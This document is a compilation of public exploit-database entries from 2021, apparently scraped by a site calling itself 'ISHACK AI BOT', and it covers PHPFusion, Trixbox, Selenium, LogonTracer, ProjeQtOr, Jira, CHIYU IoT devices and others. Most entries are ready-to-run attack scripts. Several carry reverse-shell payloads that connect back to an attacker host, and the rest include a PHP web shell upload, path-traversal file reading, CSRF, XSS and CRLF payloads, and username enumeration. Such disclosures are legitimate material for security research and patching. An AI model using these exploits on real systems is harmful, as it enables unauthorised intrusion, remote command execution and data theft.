ISHACK AI BOT

# Exploit Title: PHPFusion 9.03.50 - Remote Code Execution # Date: 20/05/2021 # Exploit Author: g0ldm45k # Vendor Homepage: https://www.php-fusion.co.uk/home.php # Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30&download_id=606 # Version: 9.03.50 # Tested on: Docker + Debian GNU/Linux 8 (jessie) # CVE : CVE-2020-24949 # Found by: ThienNV import requests import base64 import argparse PAYLOAD = "php -r '$sock=fsockopen(\"127.0.0.1\",4444);exec(\"/bin/sh -i <&4 >&4 2>&4\");' " # !!spaces are important in order to avoid ==!! REQUEST_PAYLOAD = "/infusions/downloads/downloads.php?cat_id=$\{{system(base64_decode({})).exit\}}" parser = argparse.ArgumentParser(description='Send a payload to a Fusion 9.03.50 server with "Allow PHP Execution" enabled.') parser.add_argument('target', type=str, help='Turn the Allow PHP Execution verification step on or off.') parser.add_argument("-v", "--no-verify", action="store_false") args = parser.parse_args() if args.target.startswith("http://") or args.target.startswith("https://"): target = args.target else: print("[!] Target should start with either http:// or https://") exit() # verify payload PAYLOAD_B64 = base64.b64encode(PAYLOAD.encode('ascii')).decode("ascii") if '+' in PAYLOAD_B64 or '=' in PAYLOAD_B64: print("[!] Invalid payload, make sure it does not contain a + or a =!") exit() # verify vulnerable host if args.no_verify: page_data = requests.get(target + "/infusions/downloads/downloads.php?cat_id=${system(ls)}") if "infusion_db.php" not in page_data.text: print("[!] Can't seem to find infusion_db.php. QUITTING!") print("[!] If this validation is wrong just use the --no-verify flag.") exit() # send request requests.get(target + REQUEST_PAYLOAD.format(PAYLOAD_B64)) print("[*] Requests send, did you get what you wanted?")

# Exploit Title: WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS) # Date: 2021-05-10 # Exploit Author: Captain_hook # Vendor Homepage: https://lifterlms.com/ # Software Link: https://github.com/gocodebox/lifterlms/releases/tag/4.21.0 # Version: LifterLMS < 4.21.1 # Tested on: ANY # CVE : CVE-2021-24308 #Summary: The 'State' field of the Edit profile page of the LMS by LifterLMS – Online Course, Membership & Learning Management System Plugin for WordPress plugin before 4.21.1 is not properly sanitised when output in the About section of the profile page, leading to a stored Cross-Site Scripting issue. This could allow low privilege users (such as students) to elevate their privilege via an XSS attack when an admin will view their profile. #Proof_of_Concept: 1- As a Lowest Privilege user go to the edit account page of the LMS (e.g https://example.com/my-courses/edit-account/) 2- Put Your XSS payload in State parameter and save your edits, such as "><script>alert(/XSS/)</script> 3- The XSS will be stored and triggered in the about section of the profile: (e.g https://example.com/directory/[user_name]/) (Note): The XSS will also be triggered in the admin dashboard when viewing the user details, for example https://example.com/wp-admin/admin.php?page=llms-reporting&tab=students&stab=information&student_id=2 Refernces: https://github.com/gocodebox/lifterlms/releases/tag/4.21.0

# Exploit Title: Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated) # Date: 27.05.2021 # Exploit Author: Ron Jost (Hacker5preme) # Credits to: https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ # Credits to: Sachin Wagh # Vendor Homepage: https://sourceforge.net/projects/asteriskathome/ # Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download # Version: 2.8.0.4 # Tested on: Xubuntu 20.04 # CVE: CVE-2017-14535 ''' Description: trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php ''' ''' Import required modules: ''' import requests import sys import time ''' User-input: ''' target_ip = sys.argv[1] target_port = sys.argv[2] listen_ip = sys.argv[3] listen_port = sys.argv[4] ''' Construct malicious request: ''' # Construct header: header = { 'Host': target_ip, 'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=', 'Connection': 'close', 'Upgrade-Insecure-Requests': '1', 'Cache-Control': 'max-age=0' } # Construct malicious link: link_p1 = 'http://' + target_ip + ':' + target_port + '/maint/modules/home/index.php?lang=english|bash%20-i%20%3E%26%20' link_p2 = '%2Fdev%2Ftcp%2F' + listen_ip + '%2F' + listen_port + '%200%3E%261||x' link = link_p1 + link_p2 ''' Finish: EXPLOIT!!! ''' print('') print('') print('Please start the following command in a seperate terminal: nc -lnvp ' + listen_port) print('') time.sleep(2) Ready = input("If you're done and want to start the exploit please input EXPLOIT: ") if Ready == 'EXPLOIT': print('') print('Exploit sent, check your Netcat instance :)') x = requests.post(link, headers=header) else: print('TRY AGAIN')

# Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal # Date: 27.05.2021 # Exploit Author: Ron Jost (Hacker5preme) # Credits to: https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ # Credits to: Sachin Wagh # Vendor Homepage: https://sourceforge.net/projects/asteriskathome/ # Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download # Version: 2.8.0.4 # Tested on: Xubuntu 20.04 # CVE: CVE-2017-14537 ''' Description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php. ''' ''' Import required modules: ''' import requests import sys import urllib.parse ''' User-Input: ''' target_ip = sys.argv[1] target_port = sys.argv[2] ''' Construct malicious request: ''' # Constructing header: header = { 'Host': target_ip, 'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Cookie': 'template=classic; lng=en; lng=en', 'Upgrade-Insecure-Requests': '1', 'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=', } # Constructing malicious link (payload): base_link = 'http://' + target_ip + ':' + target_port base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..' base_link_addon_3 = '%00english' print('') base_link_addon_2 = input('Input the filepath or input EXIT: ') ''' EXPLOIT: ''' while base_link_addon_2 != 'EXIT': base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='') exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3 print('') exploit = requests.post(exploit_link, headers=header) print('Contents of ' + base_link_addon_2 + ':') for data in exploit.iter_lines(): data = data.decode('utf-8') if data != '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">': print(data) else: break print('') base_link_addon_2 = input('Input the filepath or input EXIT: ')

# Exploit Title: Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) # Date: 2021-05-27 # Exploit Author: Jon Stratton # Vendor Homepage: https://www.selenium.dev/ # Software Link: https://selenium-release.storage.googleapis.com/3.141/selenium-server-standalone-3.141.59.jar # Version: 3.141.59 # Tested on: Selenium Server 3.141.59, webdriver, geckodriver # # https://github.com/JonStratton/selenium-node-takeover-kit/blob/master/examples/selenium_node_rce.rb # # When Selenium runs, it creates a custom profile (in /tmp/ for Linux) on the Node. This profile then gets overwritten by a possible overlay that is sent in a base64 encoded zip file when a Selenium session is started. # # One of the config file can be used to set a custom handler (which do things like, for instance, associates “mailto:[email protected]” to your email client). In this example, a new handler is created for “application/sh” that will execute the argument with “/bin/sh” # # Side notes, this profile doesn't safely unzip. So this can be used to write files to the file-system. # # The Payload is encoded and embedded as inline data associated with the "application/sh" mime type. #!/usr/bin/env ruby require 'optparse' require 'net/http' require 'json' require 'uri' require 'zip' require 'base64' options = {} OptionParser.new do |opts| opts.banner = 'Usage: example.rb [options]' opts.on('-hURL', '--hubURL', 'Selenium Hub URL') do |h| options[:hub] = h end opts.on('--help', 'Prints this help') do puts opts exit end end.parse! hub_url = options[:hub] payload = 'rm -rf $0 echo success > /tmp/selenium_node_rce.txt' # Build profile zip file. stringio = Zip::OutputStream::write_buffer do |io| # Create a handler for shell scripts io.put_next_entry("handlers.json") io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}') end stringio.rewind encoded_profile = Base64.strict_encode64(stringio.sysread) # Create session with our new profile newSession = {:desiredCapabilities => {:browserName => "firefox", :firefox_profile => encoded_profile}} uri = URI.parse(hub_url) http = Net::HTTP.new(uri.host, uri.port) # Start session with encoded_profile and save session id for cleanup. uri = URI.parse("%s/session" % [hub_url]) request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json') request.body = JSON.generate(newSession) response = http.request(request) sessionId = JSON.parse(response.body)["value"]["sessionId"] # URL. data_url = "data:application/sh;charset=utf-16le;base64,%s" % [Base64.encode64(payload)] uri = URI.parse("%s/session/%s/url" % [hub_url, sessionId]) request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json') request.body = JSON.generate(:url => data_url) response = http.request(request) # End session(not working) uri = URI.parse("%s/session/%s" % [hub_url, sessionId]) request = Net::HTTP::Delete.new(uri.request_uri) http.request(request) exit

# Exploit Title: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated) # Date: 29/05/2021 # Exploit Author: g0ldm45k # Vendor Homepage: https://www.jpcert.or.jp/ # Software Link: https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.0 # Version: 1.2.0 and earlier # Tested on: Version 1.2.0 on Debian GNU/Linux 8 (jessie) # CVE : CVE-2018-16167 import requests import argparse parser = argparse.ArgumentParser(description='Send a payload to a LogonTracer 1.2.0 (or earlier) server.') parser.add_argument('aip', type=str, help='Attacker ip') parser.add_argument('aport', type=str, help='Attacker port') parser.add_argument('victimurl', type=str, help='Victim URL minus the path.') args = parser.parse_args() ATTACKER_IP = args.aip ATTACKER_PORT = args.aport PAYLOAD = f"python -c 'import pty,socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ATTACKER_IP}\",{ATTACKER_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'" VICTIM_URL = args.victimurl VICTIM_ENDPOINT = "/upload" DATA = { "logtype": "XML", "timezone": f"1;{PAYLOAD};", } print("[!] Sending request... If your terminal hangs, you might have a shell!") requests.post(f"{VICTIM_URL}{VICTIM_ENDPOINT}", data=DATA) print("[*] Done. Did you get what you wanted?")

# Exploit Title: DupTerminator 1.4.5639.37199 - Denial of Service (PoC) # Date: 2021-05-28 # Author: Brian Rodríguez # Software Site: https://sourceforge.net/projects/dupterminator/ # Version: 1.4.5639.37199 # Category: DoS (Windows) ##### Vulnerability ##### DupTerminator is vulnerable to a DoS condition when a long list of characters is being used in field "Excluded" text box. Successful exploitation will causes application stop working. I have been able to test this exploit against Windows 10. ##### PoC ##### #!/usr/bin/env python buffer = "\x41" * 8000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")

# Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution # Date: 29.05.2021 # Exploit Author: Temel Demir # Vendor Homepage: https://www.projeqtor.org # Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV9.1.4.zip # Version: v9.1.4 # Tested on: Laragon @WIN10 # Description : Remote code execution and authorization upgrade with guest user. A malicious file can be run with arbitrary file upload in the profile editing section. PoC Process Step_by_Step: # 1) Create a file with the below php code and save it as demir.pHp <?php echo shell_exec($_GET['key'].' 2>&1'); ?> # 2) Login to ProjeQtOr portal as guest user # 3) Click -profile- button on header panel. # 4) Click -add photo- button and chose upload section and browse your demir.pHp file. # 5) Click OK. Script will give you "Attachment #($number) inserted". Attachment number need us for file path. (demo: attachment number is "23" > file directory "/files/attach//attachment_23/" ) # 6) As a last step you have to add the ".projeqtor" statement to the file extension. You can call the uploaded file like this > http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor # 7) Exploit: http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor?key=[command] Example Request: POST /project/tool/saveAttachment.php HTTP/1.1 Host: ip:port Content-Length: 1196 Accept: application/json X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEPEodMA4Ojb7pSuQ Origin: http://ip:port/website_location/ Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://ip:port/website_location/view/main.php Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=($your_phpsessid_c //edit); projeqtor=($your_projeqtor_c //edit) Connection: close ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentFiles[]"; filename="demir.pHp" Content-Type: application/octet-stream <?php echo shell_exec($_GET['key'].' 2>&1'); ?> ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentId" ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentRefType" User ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentRefId" ($your_profile_id //edit) ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentType" file ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="MAX_FILE_SIZE" 10485760 ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentLink" ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentDescription" ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentPrivacy" 1 ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="uploadType" html5 ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ--

# Exploit Title: WordPress Plugin WP Prayer version 1.6.1 - 'prayer_messages' Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2021-05-31 # Exploit Author: Bastijn Ouwendijk # Vendor Homepage: http://goprayer.com/ # Software Link: https://wordpress.org/plugins/wp-prayer/ # Version: 1.6.1 and earlier # Tested on: Windows 10 # Proof: https://bastijnouwendijk.com/cve-2021-24313/ Steps to exploit this vulnerability: 1. Log into the WordPress website with a user account, can be a user with any role 2. Go to the page where prayer or praise request can be made and fill in the requested information 3. In the 'prayer_messages' field of the prayer request form put the payload: <script>alert("XSS")</script> 4. Submit the form 5. Go to the page where the prayer requests are listed 6. The prayer requests are loaded and an alert is shown with text 'XSS' in the browser

# Exploit Title: Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF) # Date: 2021-05-30 # Exploit Author: lated # Vendor Homepage: https://www.ubeeinteractive.com # Version: EVW327 <html> <body> <form action="http://192.168.0.1/goform/UbeeMgmtRemoteAccess" method="POST"> <input type="hidden" name="RemoteAccessEnable" value="1"/> <input type="hidden" name="RemoteAccessPort" value="8080"/> <input type="hidden" name="ApplyRemoteEnableAction" value="1"/> </form> <script> document.forms[0].submit(); </script> </body> </html>

# Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS) # Date: May 31 2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html # Software Link: https://www.chiyu-tech.com/category-hardware.html # Version: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions < June 2021 # Tested on: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC # CVE: CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643 # Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks Description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws. #1: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices CVE ID: CVE-2021-31250 CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250 ============= PoC 01 =============== Affected parameter: TF_submask Component: if.cgi Payload: "><script>alert(123)</script> HTTP Request: GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/ap_tcps.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (if.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_submask) 4. Submit the request and observe payload execution ============= PoC 02 =============== Affected parameter: TF_hostname=Component: dhcpc.cgi Payload: /"><img src="#"> HTTP request and response: HTTP Request: GET /dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/wan_dc.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (dhcpc.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_hostname) 4. Submit the request and observe payload execution ============= PoC 03 =============== Affected parameter: TF_servicename=Component: ppp.cgi Payload: "><script>alert(123)</script> GET /ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY HTTP/1.1 Host: 192.168.187.143 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.143/wan_pe.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (ppp.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_servicename) 4. Submit the request and observe payload execution ============= PoC 04 =============== Affected parameter: TF_port=Component: man.cgi Payload: /"><img src="#"> GET /man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/manage.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (man.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_port) 4. Submit the request and observe payload execution #2: Unauthenticated XSS in several CHIYU IoT devices CVE ID: CVE-2021-31641 Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641 Component: any argument passed via URL that results in an HTTP-404 Payload: http://ip/<script>alert(123)</script> Steps to reproduce: 1. Navigate to the webpage of the vulnerable device 2. On the web-browsers, you need to append the payload after the IP address (see payload above) 3. Submit the request and observe payload execution #3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices CVE ID: CVE-2021-31643 Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643 Affected parameter: username= Component: if.cgi Payload: "><script>alert(1)</script> HTTP request - SEMAC Web Ver7.2 GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: close Referer: http://127.0.0.1/EmpRcd.htm Cookie: fresh=; remote=00000000 Upgrade-Insecure-Requests: 1 HTTP request - BIOSENSE-III-COMBO(M1)(20000) GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: close Referer: http://127.0.0.1/EmpRcd.htm Cookie: fresh= Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (if.cgi) 3. Append the payload at the end of the vulnerable parameter (username) 4. Submit the request and observe payload execution

# Exploit Title: CHIYU TCP/IP Converter devices - CRLF injection # Date: May 31 2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html # Software Link: https://www.chiyu-tech.com/category-hardware.html # Version: BF-430, BF-431, and BF-450M TCP/IP Converter devices - all firmware versions < June 2021 # Tested on: BF-430, BF-431, and BF-450M # Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks Description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components. CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 Affected parameter: redirect=Component: all the CGI components Payload: %0d%0a%0d%0a<script>alert(document.domain)</script> ====HTTP request====== GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/manage.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 ======HTTP response======== HTTP/1.1 302 Found Location: setting.htm <script>alert(document.domain)</script> Content-Length: 0 Content-Type: text/html Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to all CGI components 3. Append the payload at the end of the vulnerable parameter (redirect ) 4. Submit the request and observe payload execution Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.

# Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration) # Date: 31/05/2021 # Exploit Author: Mohammed Aloraimi # Vendor Homepage: https://www.atlassian.com/ # Software Link: https://www.atlassian.com/software/jira # Vulnerable versions: version 8.11.x to 8.15.0 # Tested on: Kali Linux # Proof Of Concept: ''' A username information disclosure vulnerability exists in Atlassian JIRA from versions 8.11.x to 8.15.x. Unauthenticated users can ENUMRATE valid users via /secure/QueryComponent!Jql.jspa endpoint. Tested versions: Atlassian JIRA 8.11.1 Atlassian JIRA 8.13 Atlassian JIRA 8.15 ''' #!/usr/bin/env python __author__ = "Mohammed Aloraimi (@ixSly)" import requests import sys import re import urllib3 urllib3.disable_warnings() def help(): print('python script.py <target> <username>') print('e.g. python script.py https://jiratarget.com admin') sys.exit() if len(sys.argv) < 3: help() def pwn(url,username): try: headers = {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"} data="jql=creator+in+({})&decorator=none".format(username) req = requests.post(url+"/secure/QueryComponent!Jql.jspa",headers=headers,verify=False,data=data) if "issue.field.project" in req.text and req.status_code == 200: print("[+] {} is a Valid User".format(username)) userFullName=re.search('value=\"user:{}\" title=\"(.+?)\"'.format(username),str(req.json()["values"]["creator"]).strip()) if userFullName: print("[+] User FullName: " + userFullName.group(1)) elif '["jqlTooComplex"]' in req.text and req.status_code == 401: print("[-] {} is not a Valid User".format(username)) else: print("[-] Error..") except Exception as e: print(str(e)) pass server = sys.argv[1] username = sys.argv[2] pwn(server,username)

# Exploit Title: Veyon 4.4.1 - 'VeyonService' Unquoted Service Path # Discovery by: Víctor García # Discovery Date: 2020-03-23 # Vendor Homepage: https://veyon.io/ # Software Link: https://github.com/veyon/veyon/releases/download/v4.4.1/veyon-4.4.1.0-win64-setup.exe # Tested Version: 4.4.1 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Pro x64 # CVE: CVE-2020-15261 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ Veyon Service VeyonService C:\Program Files\Veyon\veyon-service.exe # Service info: C:\>sc qc VeyonService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VeyonService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Veyon\veyon-service.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Veyon Service DEPENDENCIES : Tcpip : RpcSs SERVICE_START_NAME : LocalSystem # Exploit: # A successful attempt would require the local user to be able to insert their code in the # system root path undetected by the OS or other security applications where it could # potentially be executed during application startup or reboot. If successful, the local # user's code would execute with the elevated privileges of the application.

